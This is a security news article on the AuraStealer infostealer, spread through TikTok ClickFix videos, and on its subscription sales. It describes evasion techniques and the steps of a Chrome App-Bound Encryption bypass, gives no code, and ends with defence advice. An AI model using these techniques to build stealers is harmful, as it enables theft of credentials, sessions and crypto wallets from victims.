AuraStealer Spreads via TikTok ClickFix Scams, Targets 110+ Browsers

A new infostealer called AuraStealer has emerged as a significant threat, leveraging TikTok videos, sophisticated anti-analysis techniques, and a bypass for Chrome's Application-Bound Encryption to harvest credentials from over 110 browsers.

Security researchers at GenDigital and Intrinsec have published technical analyses revealing the malware's capabilities, which position it as a direct competitor to the now-disrupted LummaC2 stealer.

TikTok as a Distribution Channel

AuraStealer reaches victims through ClickFix-style social engineering—the same technique we've seen in multiple campaigns this year. But the operators have found a new delivery channel: TikTok.

Short videos pose as tutorials for activating pirated software like Windows, Microsoft 365, Adobe Photoshop, Netflix, and Spotify. Viewers are instructed to open PowerShell with administrator privileges and run a one-line command. That command downloads and executes AuraStealer silently.

The social engineering exploits the platform's format. TikTok videos are short, casual, and often consumed without skepticism. Users searching for "free software activation" find exactly what they're looking for—along with malware.

48 C2 Domains and a Subscription Model

Intrinsec analysts identified 48 command-and-control domains linked to AuraStealer operations. Early versions (1.0.x through 1.2.x) used .SHOP domains, while newer 1.5.2 samples favor .CFD addresses—an infrastructure rotation likely designed to evade blocklists.

The malware operates on a subscription model, sold by the "AuraCorp" team on Russian-language cybercrime forums:

• Basic: $295/month
• Advanced: $585/month
• Team: Collaborative access

The operators claim 5-11 years of experience and market AuraStealer as a successor to LummaC2, which was disrupted in mid-2025.

Technical Sophistication

AuraStealer employs multiple layers of evasion that complicate analysis:

Exception-Driven API Hashing: Instead of calling Windows API functions directly, the malware triggers deliberate EXCEPTION_ACCESS_VIOLATION exceptions caught by a custom handler. Functions are resolved using MurmurHash3 (seeded with 0xDEADBEEF) combined with FNV-1a hashing. XOR-masked addresses in lookup tables map to actual function addresses.

Heaven's Gate: The 32-bit malware executes 64-bit NTDLL calls to evade detection during browser injection operations.

Comprehensive Anti-Analysis: Checks include anti-tampering via binary checksum verification, Sleep hook detection, emulator artifact searches (looking for usernames like "JohnDoe" and "HAL9TH"), CPUID checks for virtualization, minimum processor count requirements (4+), and PEB flag inspection for debugger detection.

Geolocation Blocking: The malware checks system locale settings and blocks execution in certain countries—likely to avoid compromising systems in the operators' home region.

Breaking Chrome's Cookie Encryption

AuraStealer's most concerning capability is its ABE bypass for Chrome's Application-Bound Encryption, introduced to protect cookies and session tokens.

The stealer spawns Chrome in suspended headless mode, injects code via shared memory sections (NtCreateSection, NtMapViewOfSection), and invokes IElevator::Decrypt to decrypt the app_bound_encrypted_key. Temporary files facilitate inter-process communication for the encrypted key exchange.

This technique defeats protections that Google implemented specifically to prevent infostealer credential theft.

What Gets Stolen

AuraStealer targets:

• Browser data from 110+ browsers (passwords, cookies, autofill)
• 70+ cryptocurrency wallet extensions and desktop wallets
• Session tokens (Discord, Telegram, Steam)
• 2FA authenticator data
• Recovery seeds and private keys
• Remote access configurations (AnyDesk, FileZilla)
• Password manager databases
• VPN configurations
• Clipboard contents and screenshots

All exfiltrated data is AES-CBC encrypted with randomly generated keys before transmission to C2 servers via three dedicated endpoints.

Defense Recommendations

Organizations should:

1. Block known AuraStealer C2 domains at the network perimeter
2. Monitor for PowerShell execution patterns consistent with ClickFix attacks
3. Implement application whitelisting to prevent unauthorized script execution
4. Educate users about software piracy risks—the primary distribution vector
5. Deploy endpoint detection focused on browser injection techniques

The ClickFix technique continues to prove effective because it bypasses traditional security controls. The victim manually executes the malicious command, making it appear as legitimate user activity.

For a list of IOCs including C2 domains and sample hashes, see the GenDigital technical report.